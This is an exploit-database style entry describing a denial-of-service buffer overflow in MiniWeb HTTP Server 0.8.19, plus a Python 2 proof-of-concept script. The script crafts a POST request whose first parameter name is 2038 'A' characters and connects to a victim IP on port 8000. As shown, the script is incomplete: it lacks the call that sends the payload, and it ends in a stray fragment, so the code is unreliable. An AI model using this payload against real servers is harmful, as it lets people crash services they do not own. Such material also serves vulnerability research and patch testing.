MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)

ID: 103741
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 13.12.2020
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team -


 MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
 first parameter in a POST request.


 The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
 if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a long time. 
In 2020, we created where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here:



import socket
import sys
import struct

if len(sys.argv) != 2 :
	print "[+] Usage : python [VICTIM_IP]"

TCP_IP = sys.argv[1]
TCP_PORT = 8000

xx = "A"*2038 #4085

http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host:\r\n"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1&param_name2=param_data2"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
1-4-2 (www01)